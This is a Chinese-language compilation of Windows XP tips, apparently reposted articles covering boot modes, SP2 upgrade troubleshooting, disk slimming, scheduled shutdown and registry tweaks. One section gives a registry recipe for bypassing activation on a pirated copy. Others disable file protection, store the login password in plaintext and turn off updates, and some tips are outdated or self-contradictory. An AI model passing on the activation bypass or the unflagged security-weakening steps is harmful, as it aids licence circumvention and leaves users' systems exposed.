  Windows XP默认支持.ZIP文档，但系统会为此耗费大量资源，你可以将这一功能关闭，只需在“开始”选单的“运行”中输入“regsvr32/u zipfldr.dll”即可。
●卸载无用的动态链接
  资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。注意：为了让设置生效，需要重新启动计算机。
●消除Windows文档保护功能
为了完全消除Windows文档保护功能，打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon SFCDisable=0xFFFFFF9D
●查看驱动器组件信息
右键点击“我的电脑”，点选弹出选单中的“管理”，依次打开“可移动存储”→“库”，用右键点击所要查询的驱动器，点选弹出选单中的“属性”，点选“设备信息”就可看到驱动器的信息了。
●在关机时清空页面文件
打开“控制面板”，点击“管理工具”→“本地安全策略”→“本地策略”→“安全选项”，双击其中“关机：清理虚拟内存页面文件”一项，点击弹出选单中的“已启用”选项，单击“确定”即可。


WinXP开机菜单含义

《一键清理系统垃圾》

WinXP开机菜单含义

    在启动时按F8键或当计算机不能正常启动时，就会进入Windows XP启动的高级选项菜单，在这里可以选择除正常启动外的8种不同的模式启动Windows XP。

(1)安全模式：选用安全模式启动Windows XP时，系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题，或者根本无法启动安全模式，那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。

(2)网络安全模式：和安全模式类似，但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障，此选项很有用。

(3)命令提示符的安全模式：也和安全模式类似，只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符，而不是Windows桌面。

(4)启用启动日志：启动Windows XP，同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt，位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。

(5)启用VGA模式：使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序，或由于刷新频率设置不当造成故障时，这种模式十分有用。当在安全模式下启动Windows XP时，只使用最基本的显卡驱动程序。

(6)最近一次的正确配置：选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动，Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。

(7)目录服务恢复模式：不适用于Windows XP Professional。这是针对Windows XP Server操作系统的，并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。

(8)调试模式：启动Windows XP，同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP，可以看到与使用远程安装服务恢复系统相关的附加选项。


XP轻松实现免激活升级

《一键清理系统垃圾》

XP轻松实现免激活升级

1.安装D版windows xp
2.打开注册表regedit
3.找到主键 Hkey_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\WPAEvents\
4.删除子键lastWPAEventLoged
5.修改子键OOBETimer键值为：ff d5 71 d6 8b 6a 8d 6f d5 33 93 fd
6.右击注册表中“WPAEvents”键→“权限”→“高级”→“所有者”→你的用户名→“应用”→“确定”
7.回到“安全”标签→“高级”→选择列表中的“system”→“编辑”
8.把“拒绝”列下的方框全部打勾即可
9.“确定”退出
重起动发现已激活。这种方法可顺利升级！！！


{XP去除开机登陆画面!)

《一键清理系统垃圾》

{XP去除开机登陆画面!)

在进入Windows XP桌面之前，每次都会出现一个用脑登录界面，要求我们输入用户名与密码，可以加大了系统的安全性，也为多人共用一台电脑提供了方便，但如果是家用电脑，只有你一个人使用，这样每次密码，的确不有点不大方便。我们可以通过修改注册表来实现XP的自动登录。

第1步：运行“regedit”，以打开“注册表管理器”；运行注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon ]分支，然后在右侧窗口双击“DefaultUserName”，接着输入你的登录用户名。如果没有预设的用户名称，可以在注册表编辑器的菜单栏点选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目，注意要区分大小写字母。

    第2步：同样在该分支下，在注册表编辑器的右侧窗口中双击“DefaultPassword”，假如未发现“DefaultPassword”一项，可按上面的步骤来新建该字符串值。

    第3步：接下来在右侧窗口中双击“AutoAdminLogon”，将数值设置为“1”。假如未发现“AutoAdminLogon”，可按上面的步骤来新建。

    现在关闭注册表编辑器并重新启动电脑，以后你会发现那个令人讨厌的登录对话框不见了。


WinXP升级到SP2的问题及解决办法常见问题

《一键清理系统垃圾》

WinXP升级到SP2的问题及解决办法常见问题

    1．第三方软件/插件原因造成无法升级

    由于在xp的SP2中，增加的安全特性中包含有恶意网站屏蔽的相关功能及弹出窗口的过滤器，这可能和您目前操作系统内所安装的第三方ie插件造成冲突。已知3721的上网助手插件和java虚拟机插件会造成该问题，解决方法是卸载3721和java虚拟机插件。当然，或许还有第三方的插件也会造成这样的问题，因此天缘推荐您在升级前，将挂接到outlook、ie和资源浏览器的所有第三方插件完全卸载掉，之后进行升级安装。

    国内常用的非微软官方发布的浏览器第三方插件如下：

    3721助手

    百度搜索

    google工具条

    cnnic中文域名解析工具

    sina 工具条

    自动填表工具条

    java虚拟机插件

    用户可根据自己的机器环境，参照上表，进行有选择性的删除，之后再进行升级。这类第三方插件一般都带有独立的删除程序，可以在“控制面板”——“添加/删除程序”中找到，进行删除。

    2．杀毒软件/防火墙中的系统文件保护功能导致无法升级

    由于在SP2升级过程中涉及到对windows xp系统文件的替换等因素，在升级过程中某些第三方杀毒软件/防火墙会自动保护关键文件不被替换，由此会导致升级无法进行。因此在升级时最好关闭所有杀毒/防火墙、不必要的应用软件，并断开网络连接以防止病毒趁虚而入，以单机环境进行升级工作。

    3．帐号权限问题导致升级失败

    请使用系统初始设定的那个管理员帐号进行升级（默认名字为administrator，当然您可能重命名过），而不是其他帐号（哪怕该帐号具有管理员权限）。否则有可能导致升级后存在一些古怪的问题。

    4．使用stylexp等第三方xp界面美化软件造成关键文件被替换/修改，导致升级失败

    由于stylexp等第三方美化软件会修改一些关键的系统文件，所以会在升级的时候，令SP2无法判断升级前的xp是否为正规的xp版本。其中最常出现的问题是boot.ini文件被修改。

    这个文件在您系统盘的根目录下（一般在c盘根目录），默认情况下为隐藏属性文件，您可以在“资源浏览器”——“工具”——“文件夹选项”——“查看”中，将“隐藏受保护的操作系统文件”和“隐藏已知文件的扩展名”选项前面的钩去掉，并点“确定”以查看boot.ini文件的内容。

    用记事本打开boot.ini，发现默认的启动选项被修改了

    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn /kernel=xLogo.exe

    将上面红色的字去掉，保留

    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    （注意，这里只是举例，您的硬盘、分区很可能跟我有所不同，只要确保最后的启动参数中包含 /fastdetect 即可，其他参数一律去掉） 之后重新启动操作系统，SP2就能顺利地升级了。

    5．从早期的SP2 beta版本升级到正式版的问题：

    由于微软公司特别在SP2中强调了安全因素这一主题，因此此补丁包的发布，除了对固有补丁的升级外，还带有微软从易用性操作系统开发转为安全性操作系统开发的里程碑意义。为了确保正式版本的安全与稳定性，微软在此SP2正式版发布前，先后发布了2135、2149、2180等多个测试版本。

    不少喜欢第一时间接触新技术和参与评测的朋友都先后下了各个版本的SP2进行安装与测试。不过由于各种因素，SP2的正式版本是否能够正确地识别这些测试版本？至少在2180测试版本中，升级前面的测试版本需要做以下的工作。

    Regedit打开注册表，找到

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion 主键将CSDVersion和CurrentBuildNumber 这2个键删除掉。

    之后重新启动（注意，如果不重新启动可能会导致下面删除atapi.sys的时候说文件被使用着）

    重新启动后，将atapi.sys直接删除或改个名字就行了。

    然后就能进行顺利的升级了，否则升级过程中可能出现atapi.sys文件被使用的提示而导致升级失败。

    问题的解决方法

    升级过程中可能出现的问题大概就这么多了，由于SP2提高了安全特性，因此在升级之后，偶尔会造成一些第三方软件无法使用、网络连接故障的情形，让我们大致看看？

    1．在使用IE时竟然不能打开链接，但使用第三方浏览器（如myie，mozilla）没事？

    遇到这个情形的朋友，就是在升级前没有卸载掉3721等浏览器插件导致的。解决办法是禁用其他第三方插件的弹出窗口过滤。（在测试过程中，天缘发现google的工具条能在SP2中正常使用，但是还是建议将其关掉）

    2．装完SP2后,CS不能进行网上对战.进入游戏后,一切很正常.但选好任务后鼠标不能活动.人物不能活动；

    由于SP2在安全性方面的变动较大，有相当一部分游戏在SP2中运行都会存在问题，这只有等待游戏厂商推出补丁，还好，cs的补丁已经有了 在这里有为SP2准备的CD4.23.1.1 版本下载

    至于其他游戏，相信SP2正式版本推出以后，各游戏厂商都会第一时间推出补丁的，敬请期待。

    3．无法显示某些站点的验证码（xbm图形文件支持问题）？

    这个问题请看电脑诊所置顶帖。

    4．在局域网中共享文件传输非常慢！

    在一个局网环境下，2台xp安装了SP2，一台装有samba的linux，出现问题是，任意一台xp从linux下载文件均很慢（升级前正常），而2台xp之间彼此传输文件速度正常。

    这个问题是由于SP2升级中，对共享安全性方面做了一些改善，旧版本的samba对其支持度不够导致的。目前samba开发小组没有给出解决办法，不过相信在新版本的samba中能解决此问题，大家近期可以关注samba小组主页动态： http://www.samba.org

    5． 很多程序工作正常，联网也正常，但是不能升级？

    因为SP2的安全性的确加强了很多，特别是对组件的权限也更加严格了。因此不少原本在sp1下运行良好的程序，在SP2下是需要手工设置权限的。

    以上面提到的McAfee杀毒软件为例：

    在“开始→运行”对话框中键入“dcomcnfg.exe”，或者从控制面板中选择“管理工具”也可以打开“组件服务”窗口，“控制台根目录”——“组件服务”——“计算机”——“我的电脑”——“DCOM配置”项目，找到“FrameworkService”项（这个是mcafee 杀毒扫描使用的，右击打开属性窗口，切换到“安全”选项卡，在“启动与激活权限”小节下选“自定义”，然后点“编辑”，在弹出的“启动权限”对话框中，选“添加”，输入你的Windows登录账号和system账号，两个帐号都社会子成“本地激活”的权限，最后“确定”。

    同样的道理，遇到其他无法升级的程序时，也可以检查dcom的配置情况。

    虽然步骤的确比较麻烦，不过我想在SP2正式版本出来后，厂商门会为SP2专门推出补丁包来应付这些问题的，只是开始的阶段，还是要靠我们自己手工设置了。

    6．无法查看某些网页或chm文件及MSDN Library的问题

    部分机器在升级到xp之后，会出现无法访问某些特定的站点，或者chm文件，以及安装微软的msdn 只看到一片空白的情形。关于这一类问题的解决方法，可以通过清除系统c:\ :\Documents and Settings\<用户ID>\Local Settings\Temporary Internet Files\ 下所有文件文件的方法来修复。如果删除中提示无法删除，可新建一超级帐号登陆，然后再行删除原帐号ie 临时目录下的所有文件，之后注销用原帐号登陆。

    注意，ie中带的“清除缓存文件”功能无效，而删除该临时目录下所有文件的方法有效，估计是Content.IE5\下的index.dat文件在升级过程中受到了破坏或被锁定了！？？

    7．原本在sp1中上网很快的，SP2里怎么变得特别慢了？

    网卡驱动需要更新，请访问网卡的主页or 微软的windows update ，升级自己的驱动程序。

    在目前的升级中，遇到的问题大抵就是这些，希望此文能够帮助到各位朋友正常顺利地升级，享受xp SP2带来的新特性和更高的安全性。


WinXP瘦身办法

《一键清理系统垃圾》

WinXP瘦身办法

Windows XP安装后要占约1.5GB的硬盘空间，能不能让它也赶赶潮流，瘦一下身呢？跟我来。

1.删除系统文件备份
进入“WINDOWS\system32\dllcache”目录(默认为隐藏目录)，里面存储着约360MB的文件，它们是Windows XP系统文件的备份。当Windows XP的系统文件被替换、删除或修改时，系统可以自动从中提取出相应的系统文件进行还原，从而保证了系统的稳定性。如果你有Windows XP安装光盘或者已经将安装文件拷贝到硬盘上，那么你大可将此文件夹删除。注意：该文件夹不能直接删除，要在命令提示符下输入“sfc.exe /purgecache”(注意斜线前的空格)命令进行清除。

2.删除驱动备份
Windows XP自带了大量的硬件驱动程序，当检测到新硬件时系统会自动地提取相应的驱动程序进行安装。其实，多数情况下我们很少改变自己的硬件配置，因此在确定自己所需要的硬件驱动程序已经全部安装的情况下，可以将驱动备份文件删除。进入“WINDOWS\Driver Cache\i386”目录，找到名为“Driver.cab”的压缩文件，删除即可。此举可以释放出约73MB的硬盘空间。如果以后安装新硬件时系统找不到驱动程序，可以从安装光盘中提取。

3.删除不用的输入法
在Windows XP下有几种我们根本用不着的输入法，比如日文、韩文输入法等。删除的方法是：进入“控制面板→日期、时间、语言和区域设置→区域和语言选项”，选择“语言”选项卡，将“为东亚语言安装文件”前面的钩去掉，点“确定”后依提示删除不需要的语言选项。重新启动后，到“WINDOWS\ime”文件夹下直接删除“chtime”、“imjp8_1”和“imkr6_1”三个文件夹(它们分别对应繁体中文、日文、韩文)即可。此举可以释放约85MB的硬盘空间。

4.清空系统临时文件
在“\Documents and Settings\用户名\LocalSettings\Temp”目录下(默认为隐藏目录)存储的是软件安装或运行时留下的临时文件夹和废弃的文档，可以清空该目录。如果你是第一次这样操作，那么有可能释放出上百MB的硬盘空间。注意：这招可以经常使用。


XP瘦身，减肥大全

《一键清理系统垃圾》

XP瘦身，减肥大全

一、让系统盘更清净(可以在一定程序上保证你的电脑运行速度)
1、进入：控制面板--系统--高级--环境变量
2、单击用户变量中的TEMP--编辑--将那一长串内容变为D:\TEMP(根据你需要，可改成其它盘，但不是系统所在的就行了)
3、同上，将TMP同样改为D:\TEMP。因为这些东西是让你的系统盘快速膨胀的主要内患，其属性是隐藏的，有些朋友还找不到呢：)
4、在“系统变量”同样将TEMP和TMP改成上面的。
5、右键单击桌面“我的文档”--属性--目标文件夹中设置“目标文件夹位置”，将其改为D:\My Documents或D:\我的文档(喜欢哪个由你了)，然后可选移动。
   这个很重要，事实上当我们的电脑崩溃后，在系统盘中一般没有什么重要的东西，有用的都在My Documents中了，所以把它给挪个窝，你就什么也不用担心了，还有，有相当一部分朋友在DOS模式下还不会备份My Documents中的内容(因为那个文件夹名称很长，如果你用了中文，那就更麻烦了)
6、右键单击Internet Explorer--属性--常规--Internet临时文件--设置--移动文件夹--选择D:\Temporary Internet Files\(如果没有，可先创建，当然可用D:\TEMP或其它什么，你说了算)--确定
7、系统--高级--性能--设置--高级--虚拟内存--更改--选择D或其它非系统分区--自定义大小--输入大小M--设置；选C或系统所在分区--无分页文件--设置--确定，这样就把虚拟存储器也转到其他硬盘上了。
好了，这个世界(系统盘)清静了：)

     （转者注：虚拟内存，temp,tmp我曾转过，但在装某些软件的时候有些不妥又改了回去，若改建议一定要记住原路径。）
二，给XP减肥 (如果你的硬盘够用，可以不减了，因为万一想用其中的某个功能，你就没办法了
1.删除系统文件备份
sfc.exe /purgecache
2.删除驱动备份
windows\driver cache\i386目录下的Driver.cab文件（73mb)
3.取消系统还原(但记得要保留系统盘的系统还原哟，如果你不想用，就全给关闭了，反正我是保留着：)
4.删除Help文件（减掉40多mb)
5.删掉\WINDOWS\system32\dllcache下文件(减去200-300mb),这是备用的dll文件
只要你已拷贝了安装文件，完全可以这样做。
6.将工具软件装在系统盘，应用软件装在其他硬盘，特别提醒：你的FOXMAIL、QQ还有类似这样的东东，千万不可装在系统盘中，一旦系统完了，你也就OVER了：)（这对重装系统也有好处）。
7.删除\windows\ime下不用的输入法!(日文，韩文，简体中文输入法，84.5MB)
8.如果你认为自己有能力对付一些突发事件的话，就用ntfs装xp吧,本身就节省硬盘。不要装好汉，否则，等着CRY吧：P
三，删除烦人的msn，windows messenger
到C:\windows\inf\ 打开sysoc.inf
找 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 ，删除 hide，
变成msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 ，保存。
到控制面板-添加删除程序，就有选项可以删除了。
四，让难以胜任工作的华医生Dr.Watson下岗
      这医生看着电脑生病，只告诉你可能是什么症状(里面的症状描述我想信他自己都不知道什么意思)，但不会告诉你得了什么病，最主要的是根本不给你看病(解决问题)，这样的医生要他何用，还不如我，让他下岗吧：)
    在"开始"->"运行"中输入"drwtsn32"命令，或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson"，调出系统里的华医生Dr.Watson ，只保留"转储全部线程上下文"选项(否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找user.dmp文件，删除后可节省几十MB空间)。
、卸载无用的动态链接

五，删除资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionxplorer AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。重新启动计算机。
六，小硬盘用户有福了,有刻录机的朋友可以做gho版的XP了。
首先了解xp刚全新安装好的时候1.5G左右，默认的休眠和虚拟内存文件已经占了310m,把这两个关了可减至1.2G;把c:\windows\dllcab里面的两个压缩（只起不必每次都放系统碟作用）包80m删了，减至1.1G;还有把30m的日文和日文字典删了（我讨厌XXXXX），把c:\windows\fon里不必要的字体删了(50m左右)，减至1G;把c:\windows\system32\dllcab里面的全删了，那是dll副本320m可以放心删，至此减至680m;还有其他的250m忘了（有点过分的，微软知道会很不高兴的），有兴趣的朋友自己找，听说最低可以减至400m以下。
小心别删错了，本文只供参考，后果请自负。

七，让WINXP彻底瘦身的软件出来了！！可以卸载任何捆绑组件。包括IE。OUTLOOK,甚至Movie Maker ,MSN等等。
就是这个：XPlite
下载地址很多，这里提供2个：

http://www.onlinedown.net/soft/25033.htm
http://download.pchome.net/php/s ... mp;searchstr=XPlite

XPlite and 2000lite Professional 是一款功能非常强大的Windows XP和Windows 2000操作系统模块定制工具,程序运行后首先会取消Windows的系统文件保护功能,然后会自动扫描并获取当前操作系统中的软件配置情况,然后允许你任意卸载原本是操作系统中无法卸载删除的模块,比如操作系统原来自动安装的移动向导功能,计划任务功能,Windows SCript Host模块,核心字体模块,帮助和支持中心模块,语音功能模块,ODBC数据库驱动模块,搜索助手模块,Windows教程,驱动缓存模块,还有传真模块,聊天室模块,网络会议和电话拨号模块等等!程序共包含9大类几十种设定功能,通过此程序,你完全可以定制出一个属于自己独特的WindowsXP或者2000,也可以通过优化选择,作出只包含核心模块的最简操作系统,让WindowsXP和2000彻底瘦身。

建议使用前做好备份！！！（转者没用）

八，转者另删
一，删除所有原各文档内容；
二，删除原桌面背景；
三，删除原屏保程序（只保留了一个）；
四，删除所有原游戏；
五，删除共享文档。
以上内容我是在安全模式下用管理员身份删除的，有的还在注册表中有键值，你可搜搜全部删除。（千万别删错了）

九，删除其它无用文件建议使用supercleaner

十， NTFS分区中的文件压缩

    Windows XP对NTFS分区的文件提供了文件压缩属性，可有效的节省磁盘空间。

    在NTFS分区中，选择要压缩的文件或文件夹，单击鼠标右键，在快捷菜单中选择“属性”命令，然后在“属性”对话框的“常规”选项卡中单击“高级”按钮，在新对话框中的“压缩或加密属性”栏里勾选“压缩内容以便节省磁盘空间”复选框，在“确定”后你会发现文件所占用的磁盘空间大大减少了。


体验Windows XP系统内置的AT命令

《一键清理系统垃圾》

体验Windows XP系统内置的AT命令

    AT命令是Windows XP中内置的命令，它也可以媲美Windows中的“计划任务”，而且在计划的安排、任务的管理、工作事务的处理方面，AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。

    我们可以在“开始→运行”中输入AT命令，下面就来看看AT命令的一些实例分析。

    1、定时关机

    命令：at 21:00 ShutDown –S –T30

    该命令运行后，到了21:00点，电脑会出现“系统关机”对话框，并默认30秒延时自动关机。

    2、定时提醒

    命令：at 12:00 Net Send 10.10.36

    .122与朋友约会的时间到了，快点准备出发吧!

    其中Net Send是Windows内部程序，可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。

    3、自动运行批处理文件

    如果公司的数据佷重要，要求在指定的日期/时间进行备份，那么运行：

    命令：at 1:00AM /Every:Saturday My_BackUp.bat

    这样，在每个Saturday（周六）的早上1:00点，电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件，它包含能对系统进行数据完全备份的多条命令。

    4、取消已经安排的计划

    命令：at 5 /Delete

    有时候，你已经安排好的计划可能临时变动，这样你可以及时地用上述命令删除该计划（5为指派给已计划命令的标识编号），当然，删除该计划后，可以重新安排。


WinXP/2000操作系统自动关机的实现

《一键清理系统垃圾》

WinXP/2000操作系统自动关机的实现

Windows XP(Windows 2000也可以)自身就具备定时关机的功能，下面我们就来看看如何实现Windows XP的自动关机。

    Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows\System32文件夹中。如果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。
    比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。

      设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。

    Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如“-s”就表示关闭本地计算机，“-a”表示取消关

机操作，下面列出了更多参数，大家可以在Shutdown.exe中按需使用。

用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]

没有参数 显示此消息(与 ? 相同)
-i 显示 GUI 界面，必须是第一个选项
-l 注销(不能与选项 -m 一起使用)
-s 关闭此计算机
-r 关闭并重启动此计算机
-a 放弃系统关机
-m \\computername 远程计算机关机/重启动/放弃
-t xx 设置关闭的超时为 xx 秒
-c "comment" 关闭注释(最大 127 个字符)
-f 强制运行的应用程序关闭而没有警告
-d [u][p]:xx:yy 关闭原因代码
u 是用户代码
p 是一个计划的关闭代码
xx 是一个主要原因代码(小于 256 的正整数)
yy 是一个次要原因代码(小于 65536 的正整数)

    -f：强行关闭应用程序

    -m \\计算机名：控制远程计算机

    -i：显示图形用户界面，但必须是Shutdown的第一个选项

    -l：注销当前用户

    -r：关机并重启

    -t时间：设置关机倒计时

    -c "消息内容"：输入关机对话框中的消息内容(不能超127个字符)


WINXP优化精髓

《一键清理系统垃圾》

WINXP优化精髓

加快开机与关机的速度：

①选“开始\运行”，键入Regedit，展开HKEY_CURRENT_USER\Control Panel\Desktop，将字符串值“HungAppTimeout”的数值更改为200，再将字符串值“WaitToKillAppTimeout”的数值数据更改为1000；

②另在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control下，将字符串值“HungAppTimeout”的数值数据更改为200，将字符串值“WaitToKillServiceTimeout”的数值数据更改为〔1000〕；

③使用微软 Bootvis.exe 优化启动速度。我们到微软官方网站先下载 bootVis.exe，然后解压后运行bootvis.exe，之后在Trace下选next boot和driver delays等，此后XP会重新启动，并将记录启动数据产生成BIN的文件。再在“file\open中打开这个文件，在Trace下选Optimize system即可。
提示：此优化需时颇长，请耐心等待。

清除注册表内不用的DLL文件：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕
增加一个机码〔AlwaysUnloadDLL〕默认值为〔1〕
如默认值设定为〔0〕则代表停用此功能

加快宽频连接速度：

在〔开始〕\〔运行〕\键入〔regedit〕\在〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Policies〕\〔Microsoft〕 \〔Windows〕
增加一个名为〔Psched〕的机码
在〔Psched〕右面窗口增加一个 Dword 值〔NonBestEffortLimit〕数值数据为〔0〕
『仅适用用 Windows XP 家用版本』

加快菜单显示速度：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_CURRENT_USER〕\〔Control Panel〕\〔Desktop〕\将字符串值〔MenuShowDelay〕的数值数据更改为〔０〕
调整后如觉得菜单显示速度太快而不适应者可将〔MenuShowDelay〕的数值数据更改为〔200〕
重新启动生效 。

加快自动更新率：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔System〕\〔CurrentControlSet〕\〔Control〕\〔Update〕\将 Dword〔UpdateMode〕的数值数据更改为〔０〕。重新启动生效。

关闭启动时加载不需要的程序：

如开机时有太多的程序要运行会影响开机的速度，先检查哪些些档案会在开机时运行
在〔开始〕\〔运行〕\键入〔msconfig〕\选〔启动〕
在启动内的程序是代表开机时要运行的程序，如需暂时停止运行某些程序便取消在〔□〕的〔X〕符号便可，如想恢复开机时运行此程序在〔□〕内加回〔X〕符号便可。

停用不需要的服务：
在〔开始〕\〔运行〕\键入〔services.msc〕打开服务窗口
检查右边窗口将不需要的服务在〔启动类型〕内选〔已禁止〕；再在〔服务状态〕中选〔停用〕

善用 CPU 的 L2 Cache 加快整体效能：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕\〔CurrentControlSet〕\〔Control〕\〔SessionManager〕\在〔MemoryManagement〕的右边窗口将〔SecondLevelDataCache〕的数值数据更改为与 CPU L2 Cache 相同的十进制数值
例：P4 1.6G 的 L2 Cache 为 256Kb，数值数据更改为十进制数值 256
有关 L2 Cache 的数值并非如某些不负责任的网页乱抄过来，例如 P4 1.6G 的 L2 Cache 为 256Kb，但 P4 1.6GA 的 L2 Cache 为 512Kb
读者可以通过网络查询到有关 CPU 的 L2 Cache 的资料。

在启动计算机时运行 Defrag 程序 ：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕\〔Microsoft〕\〔Dfrg〕\〔BootOptimizefunction 〕
将字符串值〔Enable〕设定为〔Y〕等于开启，而设定为〔N〕等于关闭。

减少多重启动时等待时间：

方法一：用 Notepad 打开在 C:\　目录下的 boot.ini 档案，将内容〔timeout〕的设定值由预设的 30 (秒) 改为要求等待的秒数数字，存盘。
方法二：也可以通过〔开始〕\〔运行〕\键入〔msconfig〕，打开boot.ini 选项，进行秒数的修改。
方法三：右键点击“我的电脑”，选择属性\高级\启动和故障恢复\设置，在此修改启动等待时间。

关闭 XP 内设的烧碟功能：

如果不打算使用此功能可将其关闭，可加快使用 Nero 烧录软件的速度，因为Windows XP 的烧录系统由 Roxio 公司提供 (即与 Easy Cd Creator 同公司)。
在〔控制面板〕\〔管理工具〕\〔服务〕\在右边窗口选〔IMAPI CD-Burning COM Service〕\〔启动类型〕\选〔已停用〕

关机时自动关闭停止响应程序：

在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_USERS〕\〔.DEFAULT〕\〔Control Panel〕\在〔Desktop〕右面窗口将〔AutoEndTasks〕的数值资料改为〔1〕
注销或重新启动即可。

移除Windows Messenger：

先用 Wordpad 打开 X:\WINDOWS\inf 下的 sysoc.inf 档案
X=（XP所在的磁盘区）
将内容〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7〕
更改为〔msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7〕
存档及退出
然后在〔控制面板〕\〔添加或删除程序〕\〔添加／删除 Windows 组件〕\不选〔Windows Messenger〕\〔下一步〕\〔完成〕后便成功移除。

停止“磁盘空间不足”的通知 ：

当磁盘驱动器的容量少于 200MB 时 Windows XP 便会发出“磁盘空间不足”的通知
如需停止此功能,可按下面程序更改登录文件
在〔开始〕\〔运行〕\键入〔Regedit〕\〔HKEY_LOCAL_MACHINE〕\〔Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\在〔Policies〕下增加一个机码名〔Explorer〕(如果已有便不用增加)\在〔Explorer〕增加一个 DWORD 值〔NoLowDiskSpaceChecks〕
数值数据为〔1〕= 停止通知，值数据为〔0〕= 默认值启动通知

关闭 windows 自动更新 ：

鼠标右点〔我的电脑〕\〔内容〕\〔自动更新〕
选“关闭自动更新，我要手动更新我的计算机”

关闭启动时窗口标志画面：

在〔开始〕\〔运行〕\键入〔msconfig〕\选〔boot.ini〕
然后在〔启动选项〕内选〔NOGUIBOOT]
重新开机便没有了窗口标志的画面

使用 Windows Media Player 9 播放 DVD 盘：
在〔开始〕\〔运行〕\键入〔DVDPlay〕便会出现 Windows Media Player
按播放 VCD 型式操作便可播放 DVD 了，当然你一定要有 DVDRom 装置
如果还出现问题，在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_CURRENT_USER〕
\〔Software〕\〔Microsoft〕\〔MediaPlayer〕\〔Player〕\在〔Settings〕右边窗口
增加一个字符串值〔EnableDVDUI〕数值数据为〔yes〕

关闭自动重新启动功能：

当 Windows XP 遇到严重问题时便会突然重新开机，按下更改可以取消此功能
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕
\〔CurrentControlSet〕\〔Control〕\〔CrashControl〕\将〔AutoReboot〕dword 值更改为〔0〕重新开机生效

移除共享文档：

除正常〔我的文档〕及〔共享文档夹〕外，每个用户都会有一个独立的活页夹，
如下设定则只会保留我的活页夹，其余的不会显示出来
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕
\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕\〔MyComputer〕\〔NameSpace〕\在〔DelegateFolders〕下删除〔{59031a47-3f72-44a7-89c5-5595fe6b30ee}〕机码

取消 IE 自动缩图功能：

Internet Explorer 6 在浏览图片如大出屏幕，图片便会自动缩小如需取消这功能可按如下修改：
